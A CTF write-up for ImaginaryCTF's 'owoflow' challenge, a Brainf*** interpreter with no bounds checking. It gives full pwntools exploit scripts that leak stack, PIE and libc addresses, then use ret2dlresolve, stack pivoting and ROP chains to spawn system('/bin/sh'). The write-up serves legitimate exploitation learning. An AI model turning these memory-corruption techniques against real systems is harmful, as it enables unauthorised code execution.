owoflow
is the only pwn for ImaginaryCTF’s November round, and a friend of mine, @caprinux asked me to try this challenge.
The challenge presents an obvious vulnerability, but is harder to exploit than expected: my favorite kind of pwn.
Initial Review
Running checksec
:
$ checksec bf Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
All protections are enabled except for RELRO
, which is at Partial RELRO
.
As for the decompilation of the binary, there are only 2 relevant functions. There are no other user-defined functions (no free win
functions :(). One relevant function, of course, is main
:
undefined8 main(void) { ssize_t sVar1; long in_FS_OFFSET; undefined instrs [4104]; long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28); setvbuf(stdin,NULL,2,0); setvbuf(stdout,NULL,2,0); setvbuf(stderr,NULL,2,0); len = read(0,instrs,0xfff); instrs[(int)len] = 0; bf(instrs); if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { // WARNING: Subroutine does not return __stack_chk_fail(); } return 0;}
Well this is straghtforward, only reading 0xfff = 4095
characters into a buffer, then passing it to the bf
function:
void bf(char *buffer) { int c; long in_FS_OFFSET; char *cptr; uint data_ptr; int level; char *ifstack [10]; byte ram [40]; long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28); data_ptr = 0; level = 0; memset(ram,0,0x1e); for (cptr = buffer; *cptr != '\0'; cptr = cptr + 1) { switch(*cptr) { case '+': ram[data_ptr] = ram[data_ptr] + 1; break; case ',': c = getchar(); ram[data_ptr] = (byte)c; break; case '-': ram[data_ptr] = ram[data_ptr] - 1; break; case '.': putchar((uint)ram[data_ptr]); break; case '<': data_ptr = data_ptr - 1; break; case '>': data_ptr = data_ptr + 1; break; case '[': if (9 < level) goto exit_loc; ifstack[level] = cptr; level = level + 1; break; case ']': if (ram[data_ptr] == 0) { level = level + -1; } else { cptr = ifstack[level + -1]; } } }exit_loc: if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) { // WARNING: Subroutine does not return __stack_chk_fail(); } return;}
This is the meat of the program, and is basically a brain**** interpreter. However, there are no bounds checking.
Thus, there are 2 straightforward vulnerabilities:
- Arbitrary increase/decrease of
data_ptr
then relative-to-stack read/write. - Can decrease
level
to negative numbers, then overwritecptr
to an address beforeifstack
.
The latter vulnerability is not very useful, as after the overwrite cptr
might not be pointing to a place under your control, and thus the commands that are getting executed are not useful.
We can use the former vulnerability for our purposes.
Initial Plan
For easy pwn challenges, one can easily formulate a plan of attack. This plan is usually a exploiter’s ‘happy path’, and might not succeed (whether or not that is true is upto you … and luck).
In this case, my initial plan was:
- Hopefully, there is a
libc
pointer lying somewhere aroundram
- We position
data_ptr
(>
or<
) such that'.>' * 8
(print character then move left eight times) reveals this pointer - We position
data_ptr
around the return address then overwrite it (using',>' * 8
) with the calculated address ofsystem
and provide it with proper arguments
The most dubious point in our happy path is the first one, as it is upto a mixture of libc version, ld version, binary specifics and some luck. We can test and find out if the point checks out, by putting a breakpoint inside the bf
function (I chose to put it in the ret
instruction), then checking the address of ram
and other libc pointers:
rdi
points to our ram
, and the current instructions are ><><><><
as you can see on the stack.
Well, there are libc
pointers before ram
. Can we decrease data_ptr
to the negative range then access them?
c = process('./bf')c.sendline('<'*8 + '.>'*8) # go to -8 from ram, then print 8 bytesc.interactive()
Running this leads to:
Oops, I guess not. This is due to data_ptr
being declared as uint
(4-byte unsigned integer) and thus when converting to 8-byte for addition in:
mov eax, dword ptr [rbp - 0x88] ' <---- eax = data_ptr (uint: 0xfffffff8)movzx eax, byte ptr [rbp + rax - 0x30] ' <---- eax = ram[data_ptr]
there is no sign extension (the value is just 2-complement of 4-byte integer extended via zero-extension).
What about after ram
then?
There are pointers quite far away inside main
’s instrs
array, as well as after after it (e.g. return address of main
, which is __libc_start_main+243
).
Unfortunately, we have a issue: To access those pointers, we have to move our data_ptr
by, let’s say, X
instructions relative to ram
, using >
. This means that we will end up overwriting those pointers with the >
character since the instrs
character array is after ram
.
Welp.
Actually thinking this through
Now that we know our happy path is ruined, we can proceed to exploiting this the hard way.
Since we have relative-to-stack read/write, I thought of doing ROP to useful places. However, PIE is enabled, so we need to leak the binary’s base address first. This is trivial since the return address is close to ram
(only 0x38 away). Furthermore, a stack address is right before return address (the saved base pointer), so we can leak that too.
So we can just do this:
c.send( '>'*0x30 + '.>'*16 + <rest of payload>)stack = u64(c.recvn(8))main_ret = u64(c.recvn(8))success(f"{hex(stack) = }") # saved_rbp leaksuccess(f"{hex(main_ret) = }")
After the leak, we can position ourselves to overwrite the return address and do a ROP. What exactly can we do? Let’s try to print some gadgets:
(Note that there are more gadgets, but they are not printed for brevity)
Well atleast the usual pop_rdi
and pop_rsi
gadgets are present. But other than that, useful gadgets such as push <register>; ret
to leak pointers in registers, or gadgets to directly manipulate the stack or base pointer by meaningful offsets are not present (only the direct pop rsp
/pop rbp
gadgets are present).
Thinking back to the happy path, we note that we were defeated by having to leak libc pointers, which happened to be hard to reach.
But what if we don’t need a libc leak?
One-Hammer-Fits-All
Since we have directly control of the stack and can ROP, and since the binary is only Partial RELRO
, we can use the ret2dlresolve
technique. This is a leakless technique that directly resolves functions from libraries such as libc with just the function name and can even call the function with arguments, but requires to be able forge a chunk of memory close to the base address (actually just close to the GOT section) and requires Partial RELRO
.
This technique is slightly unreliable but pwntools
gives us a simple way to use it.
Modifying it to our needs:
c.send( '>'*0x30 + '.>'*0x10 + '<'*8 + ',>'*(20*8) + ',' + '\x00')stack = u64(c.recvn(8))main_ret = u64(c.recvn(8))success(f"{hex(stack) = }") # saved_rbp leaksuccess(f"{hex(main_ret) = }")
context.arch = 'amd64'e = ELF('./bf')e.address = main_ret - 0x13dc # resolve binary base address from main_retcontext.binary = einfo(f"{hex(context.binary.address) = }")
addr = e.address+0x5500 # just a rw section in memoryrop = ROP(context.binary)dlresolve = Ret2dlresolvePayload(e, symbol="system", args=["/bin/sh"], data_addr=addr)rop.read(0, addr)rop.ret2dlresolve(dlresolve)raw_rop = rop.chain()print(rop.dump())
# we ask for (using , in the initial instruction, right before \0x00)# an extra byte because this sets the value of rdx right before# we return from `bf`. this is normally unnecessary, but sadly# there are no gadget sto manipulate the value of rdx in the binaryc.send(raw_rop + b'\0'*0x50 + b'\xff')
payload = bytearray(dlresolve.payload)c.sendline(payload)
c.interactive()
Despite this being a copy of the code in ret2dlresolve
documentation, this doesn’t work for some reason (again, this exploit is unreliable), and it segfaults inside ld.so
of all places. After some debugging, I managed to make it work locally but it still fails on remote (perhaps I’m slightly off on the ld.so
version).
After unsuccessfully debugging a bit more, I gave up on this avenue and tried to think of another method.
Stack-pivoting
Since the libc leaks were so far away from my controlled stack, I decided to instead use stack-pivoting to position my controlled stack right before some libc leaks (in my case, the return address of main
, which will be __libc_start_main+243
’). The idea is that after the stack pivot, I can easily leak it out via only a few instructions, maneuvering using >
/<
and printing using .
.
I did this via the pop_rsp
register to pivot into a known stack location (the stack leak above is 8 bytes away from __libc_start_main+243
). Then, I called bf
directly, rather than main
, as otherwise we are just getting into the same problem as before, where the libc pointers get too far from the controlled stack. This means that I would have to provide the instructions as an argument myself, and I did this by first doing a read()
into some rw
memory of the binary to read in instructions then using the pop_rdi
gadget to set the first parameter of bf
. This gives us the desired libc leak, and we are still in position to do further overwrite of stack to ROP and call system()
. The code for this is as belows:
c.send( '>'*0x30 + '.>'*16 + '<'*8 + ',>'*(0x70) + ',' + '\x00')stack = u64(c.recvn(8))main_ret = u64(c.recvn(8))success(f"{hex(stack) = }") # stack_leaksuccess(f"{hex(main_ret) = }")
context.arch = 'amd64'e = ELF('./bf')e.address = main_ret - 0x13dccontext.binary = einfo(f"{hex(context.binary.address) = }")
aram = e.address + 0x4500 # just some rw-memory to write the additional instructions totarget = stack+8 # target contains mains's return address (somewhere in libc_start_main)other_stack = target-0x40 # for stack-pivotingpop_rsp_gadget = e.address + 0x145d # pop rsp ; pop r13 ; pop r14 ; pop r15 ; retpop_rdi_gadget = e.address + 0x1463 # pop rdi; retret_gadget = e.address + 0x1464 # ret
rop = ROP(context.binary)
rop.read(0, other_stack)rop.read(0, aram)
rop.raw(pop_rsp_gadget)rop.raw(other_stack)
raw_rop = rop.chain()print(rop.dump())
c.send(raw_rop + b'\xff') # rdx=0xff# RSP would be changed by now by the pop rsp; pop r13; pop r14; pop r15; ret; gadget.# So we provide arguments such that we give values to r13..r15, then call `bf(aram)``# r13 r14 r15 retc.send(p64(0) + p64(0) + p64(0) + p64(pop_rdi_gadget) + p64(aram) + p64(e.symbols['bf']))
pause()c.send('>'*0x48 + '.>'*8 + '<'*0x20 + ',>'*0x28) # send another list of instructions
pause()
libc_main_ret = u64(c.recvn(8)) # __libc_start_main+243libc = ELF('./libc.so.6')libc.address = libc_main_ret - 159923success(f"{hex(libc_main_ret) = }")# Standard ROP to `system('/bin/sh')` (with additional ret for movaps), as well as overwrite saved_rbpc.send(p64(0) + p64(pop_rdi_gadget) + p64(next(libc.search(b'/bin/sh'))) + p64(ret_gadget) + p64(libc.symbols['system']))
c.interactive()
Better solution
I realized that ImaginaryCTF pwn challenges are usually not supposed to be this lengthy, so I went back to look for a better solution.
Remember how we completely ignored the [
and ]
instructions? Well, oops. Turns out that we can use them as a controlled for-loop, if we don’t mind overwriting some memory: [>.,]
.
The [
and ]
instructions are basically if-statements. We turn this into a for-loop by being able to control the current ram[data_ptr]
, via the ,
instruction to read a byte of our choosing into ram[data_ptr]
. If that byte is non-zero, we jump back to the previous [
in the instructions, which is just a for-loop. Obviously, to keep progressing, we will need to overwrite some bytes in our controllable stack. To avoid overwriting too many, we can increase the number of >
inside the brackets to X so that we move every X bytes (higher is better, but too high might overwrite our valuable libc leaks).
So now that we can advance to our libc leaks without overwriting them, we just leak them, then traverse back to the stack frame then overwrite the return address to system
/one-gadget etc (I was lazy to check if my code fit one-gadget conditions so I just did a ROP to run system('/bin/sh')
).
# there is a leak at 0x40 + 0x9A * 4 = 0x2a8 (refer to previous images)
# move to 0x40 (right after return address of bf)# for-loop to move left (we will activate 4 times)# print-moveleft 8 bytes (leak libc pointer)# for-loop to move right (we will activate 8 times)# normally we would use the same for-loop as before# but we have length limitations# Overwrite return address and do ROPpayload = '>.' * 0x40 + '[' + '>'*0x9A + '.,]' + '.>'*8 + '[' + '<'*0x55 + '.,]' + '<'*8 + '>'*0x38 + ',>'*0x20info(f"{hex(len(payload)) = }")c.send(payload)
mut = bytearray(b'\0'+c.recvn(0x40)) # leak out main_ret
for i in range(3): ch = c.recvn(1) mut += ch if ch == b'\0': ch = b'\x90' # just want to make sure we are moving forward c.send(ch)mut += c.recvn(1)c.send(b'\x00')
libc_leak = u64(c.recvn(8))libc = ELF('./libc.so.6')libc.address = libc_leak - 2023424success(f"{hex(libc_leak) = }")
for i in range(7): ch = c.recvn(1) mut += ch if ch == b'\0': ch = b'\x90' # just want to make sure we are moving backward c.send(ch)mut += c.recvn(1)c.send(b'\x00')
print(hexdump(mut))
e = ELF('./bf')e.address = u64(mut[0x38:][:8]) - 0x13dc # get binary's base addresspop_rdi_gadget = e.address + 0x1463ret_gadget = e.address + 0x1464
# Standard ROP to `system('/bin/sh')` (with additional ret for movaps)c.send(p64(pop_rdi_gadget) + p64(next(libc.search(b'/bin/sh'))) + p64(ret_gadget) + p64(libc.symbols['system']))
c.interactive()
Even better solution
Recall the core problem: we can write instructions to read libc leak, but the instructions are so long they will overwrite the libc leaks.
How about if the instructions were not to overwrite the libc leaks?
Similar to the stack-pivot method, we can do a read()
to read in a string of instructions in some rw
section (rather than the stack), then call bf
with this string as a parameter.
This method is left as an exercise for the reader :P.
Conclusion
Sometimes missing the obvious solution is fine, as it leads to interesting exploration. In this case, it led me down to a strange path (as well as more reading into how ld.so
works). Hope it was fun for the other players as much as it was for me :)